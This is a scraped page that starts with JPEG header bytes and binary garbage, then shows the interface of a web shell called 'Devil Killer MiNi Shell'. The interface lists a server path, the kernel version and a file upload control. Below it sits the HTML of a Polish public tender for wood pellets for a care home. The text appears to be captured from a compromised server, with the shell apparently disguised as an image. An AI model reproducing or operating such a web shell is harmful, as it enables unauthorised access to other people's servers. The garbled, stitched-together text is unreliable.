JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240802/0044246201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa w 2024 roku opału (pelletu klasy A1 o granulacji 6 mm) dla Domu Pomocy Społecznej w Mnichowie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT JĘDRZEJOWSKI - DOM POMOCY SPOŁECZNEJ W MNICHOWIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dom Pomocy Społecznej w Mnichowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009366</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 11 Listopada 83</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jędrzejów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">413873512</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">413873512</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzp@dpsmnichow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dpsmnichow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa w 2024 roku opału (pelletu klasy A1 o granulacji 6 mm) dla Domu Pomocy Społecznej w Mnichowie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fd1651ad-736f-436d-9886-2e40f87e1298</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00442462</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00069156/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawy opału (pelletu) na potrzeby grzewcze i ciepłej wody użytkowej dla Domu Pomocy Społecznej w Mnichowie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-fd1651ad-736f-436d-9886-2e40f87e1298 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>Adres strony internetowej https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-fd1651ad-736f-436d-9886-2e40f87e1298</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Działania jakie należy wykonywać przy<br/>składaniu oferty w interaktywnym podręczniku na stronie - https://media.ezamowienia.gov.pl/pod/2022/07/Oferty-5.2.1a.pdf lub<br/>https://ezamowienia.gov.pl/pl/komponent-edukacyjny</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1, dalej „RODO”, informuję, że:<br/>a. administratorem Pani/Pana danych osobowych jest Dom Pomocy Społecznej w Mnichowie;<br/>b. inspektor danych osobowych w Domu Pomocy Społecznej w Mnichowie<br/>kontakt: adres e-mail: iod@iqsecurity.pl telefon: 665586173<br/>c. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego;<br/>d. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 11 września 2019 r.<br/>– Prawo zamówień publicznych (tj. Dz. U. 2022 r. poz. 1710), dalej „ustawa Pzp”;<br/>e. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych<br/>danych wynikają z ustawy Pzp;<br/>g. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>h. posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; na<br/>podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **; - na podstawie<br/>art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych<br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>- nie przysługuje Pani/Panu: - w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia<br/>danych osobowych; - prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS III.263.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa wg harmonogramu do 06 grudnia w 2024 roku sprasowanej biomasy drzewnej typu pellet klasy A1 o<br/>granulacji 6 mm do<br/>pomieszczenia składu opału w budynku kotłowni oraz zewnętrznego składu opału przy budynku kotłowni Domu Pomocy<br/>Społecznej w Mnichowie w ilości 150 000 kg, o parametrach :<br/>• pellet drzewny umieszczony na paletach bezzwrotnych transportowych, pakowany w workach 15 kg, opatrzonych etykietą<br/>producenta zgodną z zarejestrowaną w jednostce certyfikującej, informującą o klasie A1 produktu z podaniem numeru<br/>certyfikatu zarejestrowanego w domenie https://enplus-pellets.eu/pl/ lub https://www.dincertco.tuv.com/ celem sprawdzenia<br/>ważności certyfikatu<br/>• certyfikat musi być ważny na dzień składania oferty i w całym czasie dostawy (status certyfikatu aktywny)<br/>• każda paleta z workami pelletu zafoliowana folią stretch i zabezpieczona kapturem foliowym (pokrowcem) chroniącym na<br/>całej wysokości worki z pelletem przed niekorzystnymi warunkami atmosferycznymi<br/>• kaptury foliowe mogą podlegać zwrotowi wykonawcy po okresie ich użytkowania przez zamawiającego w stanie fizycznym<br/>wynikającym z czasu użytkowania do zabezpieczenia palet.<br/>• klasa A1, certyfikowany wg normy : ISO 17225-2<br/>• średnica 6 mm<br/>• długość w przedziale: 15 mm &lt; 40 mm<br/>• zawartość popiołu &lt; 0,7%<br/>• wilgotność &lt; 10 %<br/>• wartość opałowa &gt; 16,5 MJ/kg<br/>• gęstość nasypowa &gt; 600 kg/m3<br/>• pellet nie może zawierać piasku, ani żadnych innych zanieczyszczeń.<br/>Dostawa pelletu przy pomocy samochodu max. do 24 ton jednorazowo, workowanego po 15 kg umieszczonego na paletach<br/>bezzwrotnych.<br/>• Pierwsza dostawa - do 23.09.2024r. – 48 000 kg<br/>• Ostatnia dostawa - do 06.12.2024 roku (termin wymagany)<br/>Zamawiający zastrzega:<br/>zwiększenie (w terminie do 12.12.2024r.) lub zmniejszenie ilości dostaw o 30 % w stosunku do wielkości wagowej (150 000<br/>kg) zamawianej ilości na całość dostaw. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09111400-4 - Paliwa drzewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zwiększenie lub zmniejszenie ilości dostaw przedmiotu zamówienia.<br/>Maksymalna wartość zwiększenia do ilości podstawowej - 30%.<br/>Maksymalna wartość zmniejszenia do ilości podstawowej - 30%.<br/>Okoliczności skorzystania z opcji : możliwości finansowe budżetu Zamawiającego w celu sfinansowania zamówienia. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami:<br/>Cena oferty brutto - 100 %<br/>Kryterium „Cena” będzie liczone w następujący sposób: najwyższą liczbę punktów za to<br/>kryterium (100 pkt) otrzyma oferta o najniższej cenie brutto. Pozostali Wykonawcy odpowiednio mniej, stosownie do wzoru:<br/> najniższa zaoferowana cena brutto<br/>Cena = ------------------------------------------------------- x 100 punktów<br/> cena brutto oferty badanej<br/>W cenie brutto muszą być zawarte wszystkie koszty niezbędne do wykonania zamówienia.<br/>Kryterium najniższa cena dotyczy całości zamówienia.<br/>Zamawiający zastosował cenę jako jedyne kryterium oceny ofert ponieważ sprasowana biomasa drzewna typu pellet klasy A1 o<br/>granulacji 6 mm będąca przedmiotem zamówienia jest ogólnodostępna oraz ma ustalone standardy jakościowe. Ponadto<br/>Zamawiający doprecyzował standardy jakościowe odnoszące się do wszystkich istotnych cech sprasowanej biomasy drzewnej typu<br/>pellet klasy A1 o granulacji 6 mm będącej przedmiotem zamówienia. Cena obejmuje wszystkie koszty cyklu życia produktu.<br/>Zakupując sprasowaną biomasę drzewną typu pellet klasy A1 o granulacji 6 mm Zamawiający poza kosztami ich nabycia nie ponosi<br/>żadnych innych wydatków związanych np. z ich użytkowaniem, utrzymaniem, wycofaniem np. kosztami recyklingu. Podstawa<br/>prawna: art.246 ust 2 ustawy Pzp.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów.<br/>Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.<br/>Przyjęty sposób oceny odnosi się do całości przedmiotu zamówienia.<br/>2. Jeżeli będą oferty o takiej samej cenie, Zamawiający wezwie wykonawców, którzy złożyli te oferty - do złożenia w wyznaczonym<br/>terminie ofert dodatkowych.<br/>3. Zamówienie udzielone zostanie temu Wykonawcy, który:<br/>1) spełni wymagania określone w niniejszej SWZ oraz ustawie Pzp;<br/>2) przedłoży ofertę, która uzyska największą liczbę punktów wyliczonych zgodnie ze<br/>wzorem jak w pkt.1.<br/>4. Jeżeli została złożona oferta, której wybór prowadziłby do powstania u zamawiającego obowiązku podatkowego zgodnie z ustawą<br/>z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2018 r. poz. 2174, z późn. zm.), dla celów zastosowania kryterium<br/>ceny lub kosztu zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek<br/>rozliczyć.<br/>5. W ofercie, o której mowa w pkt 4, wykonawca ma obowiązek:<br/>a. poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania u zamawiającego obowiązku podatkowego;<br/>b. wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku<br/>podatkowego;<br/>c. wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym zamawiającego, bez kwoty podatku;<br/>d. wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą wykonawcy, będzie miała zastosowanie.<br/>6. Zamawiający udzieli zamówienia temu Wykonawcy, którego oferta otrzyma największą ilość punktów oraz spełni dodatkowe<br/>wymagania zakreślone zapisami SWZ / ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty każdy<br/>Wykonawca musi dołączyć oświadczenie o którym mowa w art. 125 ust. 1 Pzp; w zakresie wskazanym w załączniku nr 2 do SWZ o<br/>niepodleganiu wykluczeniu.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców i/lub polegania na zasobach innych podmiotów<br/>oświadczenia potwierdzające brak podstaw wykluczenia oraz spełnianie<br/>konkretnego warunku udziału w postępowaniu składa:<br/>a) każdy z Wykonawców - art. 125 ust. 4 Pzp oraz<br/>b) każdy podmiot udostępniający - art. 125 ust. 5 Pzp.<br/>3. Zamawiający nie weryfikuje podstaw wykluczenia w odniesieniu do podwykonawcy.<br/>4. Oferty wykonawców, którzy nie złożą lub nie uzupełnią oświadczenia o którym mowa w pkt 1, podlegają odrzuceniu na podstawie<br/>art. 226 ust. 1 pkt 2 lit. „c” Pzp.<br/>5. Do oferty każdy Wykonawca nie musi dołączyć przedmiotowych środków dowodowych, zgodnie z częścią VIII pkt 2.<br/>6. Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w pkt. 1, podmiotowych środków dowodowych (jeśli dotyczy) lub są<br/>one niekompletne lub zawierają błędy, zamawiający wzywa<br/>Wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że:<br/>a) oferta wykonawcy podlega odrzuceniu bez względu na ich złożenie, uzupełnienie lub poprawienie lub<br/>b) zachodzą przesłanki unieważnienia postępowania.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ofertę należy sporządzić na załączonych formularzach (lub w takiej formie), zgodnie z wymaganiami określonymi w SWZ.<br/>Oferta, której treść będzie niezgodna z warunkami zamówienia, z zastrzeżeniem art. 223 ust. 2 pkt 3 Pzp, zostanie<br/>odrzucona na podstawie art.<br/>226 ust. 1 pkt 5 Pzp. Dlatego wszelkie wątpliwości i niejasności dotyczące zapisów SWZ należy wyjaśniać z Zamawiającym<br/>przed terminem składania ofert w trybie zapytań do SWZ.<br/>2. Zgodnie z art. 63 ust. 2 ustawy Pzp - ofertę (formularz oferty) oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp, składa się, pod rygorem nieważności w formie elektronicznej opatrzonej podpisem kwalifikowanym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania<br/>wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub<br/>innym dokumencie. Kwalifikowany podpis<br/>elektroniczny powinien być wystawiony przez dostawcę kwalifikowanej usługi zaufania, będącego podmiotem świadczącym<br/>usługi certyfikacyjne –<br/>podpis elektroniczny, spełniające wymogi bezpieczeństwa określone w ustawie z dnia 5 września 2016r„ o usługach<br/>zaufania oraz identyfikacji elektronicznej (Dz.U. z 2020.0.1173) oraz<br/>przesłane za pośrednictwem środków komunikacji elektronicznej Podpis zaufany – ustawa z dnia 17 lutego 2005 r. o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne (tekst jednolity Dz.U. z 2019 r. poz. 700, z późn.zm.)<br/>Podpis osobisty – ustawa z dnia 6 sierpnia 2010 r. o dowodach osobistych<br/>(tekst jednolity Dz.U. z 2019 r. poz.653, z późn.zm.)<br/>3. Zgodnie z art. 219 ust. 2 ustawy Pzp Wykonawca może przed upływem terminu składania ofert wycofać ofertę.<br/>4. Oferta musi być sporządzona w języku polskim, w formatach danych zgodnych z katalogiem formatów wskazanych w<br/>załączniku nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia<br/>2012 r. w sprawie Krajowych Ram lnteroperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych (Dz. U. z 2017 r., poz. 2247), w szczególności: pdf, .docx, .rtf, .xps, odt i opatrzona kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>5. Jeżeli na ofertę składa się kilka dokumentów, Wykonawca powinien stworzyć folder, do którego przeniesie wszystkie<br/>dokumenty oferty, podpisane kwalifikowanym podpisem<br/>elektronicznym. Zamawiający dopuszcza w szczególności następujące formaty plików zawierających skompresowane dane:<br/>.zip, .7z. zgodnie z załącznikiem nr 2 do rozporządzenia o którym mowa w ust. 6.<br/>6. Oferta zostanie sporządzona zgodnie z treścią Formularza Ofertowego, którego wzór stanowi załącznik nr 1 do SWZ. W<br/>przypadku gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić<br/>wszystkie informacje wymagane w Formularzu Ofertowym.<br/>7. Wraz z ofertą Wykonawca<br/>składa także, sporządzone w języku polskim:<br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 PZP, którego wzór określa załącznik nr 2 do SWZ . W przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z<br/>Wykonawców.<br/>2) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Dokumenty potwierdzające umocowanie do reprezentowania<br/>sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 